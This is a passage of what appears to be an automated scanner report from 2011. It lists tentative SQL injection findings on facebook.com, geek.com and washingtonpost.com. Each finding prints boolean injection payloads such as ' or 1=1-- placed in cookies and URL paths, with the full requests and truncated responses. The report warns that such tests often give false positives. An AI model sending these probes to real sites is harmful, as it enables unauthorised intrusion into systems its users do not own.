GET /plugins/recommendations.php?border_color=%23ffffff&header=true&height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.slashgear.com&width=315 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cdn.slashgear.com/fbrecom.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo219807859'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.32.56
X-Cnection: close
Date: Tue, 10 May 2011 13:40:14 GMT
Content-Length: 11590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u481454_1" class="fbConnectWidgetTopmost " style="height:298px; width:313px; border-color:#ffffff;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="cdn.slashgear.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://cdn.slashgear.com/fbrecom.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u481454_2"><input value="Sign Up" type="submit" id="u481454_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u481454_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_734a3eb70875527f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.slashgear.com/samsung-galaxy-s-ii-revie
...[SNIP]...

Request 2

GET /plugins/recommendations.php?border_color=%23ffffff&header=true&height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.slashgear.com&width=315 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cdn.slashgear.com/fbrecom.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo219807859'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.96.31
X-Cnection: close
Date: Tue, 10 May 2011 13:40:15 GMT
Content-Length: 11614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u481572_1" class="fbConnectWidgetTopmost " style="height:298px; width:313px; border-color:#ffffff;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="cdn.slashgear.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://cdn.slashgear.com/fbrecom.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u481572_2"><input value="Sign Up" type="submit" id="u481572_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u481572_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_734a3eb70875527f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.slashgear.com/samsung-galaxy-s-ii-rev
...[SNIP]...

1.25. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.geek.com
Path:   /wp-content/themes/geek6/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 32327582'%20or%201%3d1--%20 and 32327582'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes32327582'%20or%201%3d1--%20/geek6/favicon.ico HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=225658124.1305033255.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=225658124.910637680.1305033255.1305033255.1305033255.1; __utmc=225658124; __utmb=225658124.1.10.1305033255; s_cc=true; sc_id=null; s_sq=%5B%5BB%5D%5D; __switchTo5x=18; __unam=1c2dd7f-12fda0bbbee-38620289-1; _chartbeat2=8c5rotiu3iho8551

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:53:41 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44315
X-Varnish: 924440538
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:53:26 GMT
Date: Tue, 10 May 2011 13:53:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-switching-psn-back-on-again-free-games-to-be-offered-2011058/">Sony delay switching PSN back on again, free games to be offered</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/53_Closed_HdOnTouchUp-High-res-e1304991616778.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/chips/panasonic-toughbook-53-annoucement-20110510/">Panasonic trims the semi-rugged Toughbook 53 down to 5.6 pounds</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/nvidia_icera.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/mobile/nvidia-buys-icera-tegra-to-get-integrated-3g4g-chip-2011059/">Nvidia buys Icera, Tegra to get integrated 3G/4G chip</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/BlackOps_screen.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/activision-confirms-next-cod-will-have-premium-online-features-20110510/">Activision confirms next COD will have premium online features</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h
...[SNIP]...

Request 2

GET /wp-content/themes32327582'%20or%201%3d2--%20/geek6/favicon.ico HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=225658124.1305033255.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=225658124.910637680.1305033255.1305033255.1305033255.1; __utmc=225658124; __utmb=225658124.1.10.1305033255; s_cc=true; sc_id=null; s_sq=%5B%5BB%5D%5D; __switchTo5x=18; __unam=1c2dd7f-12fda0bbbee-38620289-1; _chartbeat2=8c5rotiu3iho8551

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:53:49 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44243
X-Varnish: 1842945301
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:53:29 GMT
Date: Tue, 10 May 2011 13:53:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/microsoft-buys-skype-20110510/">Microsoft buys Skype</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Xbox_Next_02.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/ea-has-next-xbox-hardware-microsoft-to-reveal-at-e3-2011056/">EA has next Xbox hardware, Microsoft to reveal at E3?</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Netflix-Xbox360-580x326.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/chrome-os-to-offer-netflix-support-at-launch-2011059/">Chrome OS to offer Netflix support at launch</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Google_Chrome_2011_Wordmark_Logo.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/googles-chrome-browser-has-finally-been-hacked-2011059/">Google&#8217;s Chrome browser has finally been hacked</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-
...[SNIP]...

1.26. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.geek.com
Path:   /wp-content/themes/geek6/styles/redesign.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 79240031'%20or%201%3d1--%20 and 79240031'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/geek679240031'%20or%201%3d1--%20/styles/redesign.css?ver=416 HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:30:02 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44307
X-Varnish: 1842939858
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:29:40 GMT
Date: Tue, 10 May 2011 13:29:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/microsoft-buys-skype-20110510/">Microsoft buys Skype</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Xbox_Next_02.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/ea-has-next-xbox-hardware-microsoft-to-reveal-at-e3-2011056/">EA has next Xbox hardware, Microsoft to reveal at E3?</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Netflix-Xbox360-580x326.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/chrome-os-to-offer-netflix-support-at-launch-2011059/">Chrome OS to offer Netflix support at launch</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Google_Chrome_2011_Wordmark_Logo.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/googles-chrome-browser-has-finally-been-hacked-2011059/">Google&#8217;s Chrome browser has finally been hacked</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-
...[SNIP]...

Request 2

GET /wp-content/themes/geek679240031'%20or%201%3d2--%20/styles/redesign.css?ver=416 HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:29:57 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44379
X-Varnish: 924435317
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:29:42 GMT
Date: Tue, 10 May 2011 13:29:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-switching-psn-back-on-again-free-games-to-be-offered-2011058/">Sony delay switching PSN back on again, free games to be offered</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/53_Closed_HdOnTouchUp-High-res-e1304991616778.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/chips/panasonic-toughbook-53-annoucement-20110510/">Panasonic trims the semi-rugged Toughbook 53 down to 5.6 pounds</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/nvidia_icera.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/mobile/nvidia-buys-icera-tegra-to-get-integrated-3g4g-chip-2011059/">Nvidia buys Icera, Tegra to get integrated 3G/4G chip</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/BlackOps_screen.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/activision-confirms-next-cod-will-have-premium-online-features-20110510/">Activision confirms next COD will have premium online features</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h
...[SNIP]...

1.27. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn'%20and%201%3d1--%20/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: ac0ea0da-3669-4377-a241-c816535315be
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:21:51 GMT
Date: Tue, 10 May 2011 13:21:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="791677"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:20:03 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["sn
...[SNIP]...

Request 2

GET /blogs/right-turn'%20and%201%3d2--%20/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 123499df-f418-42c8-bbd3-9d3877605e95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:21:51 GMT
Date: Tue, 10 May 2011 13:21:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:21:43 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
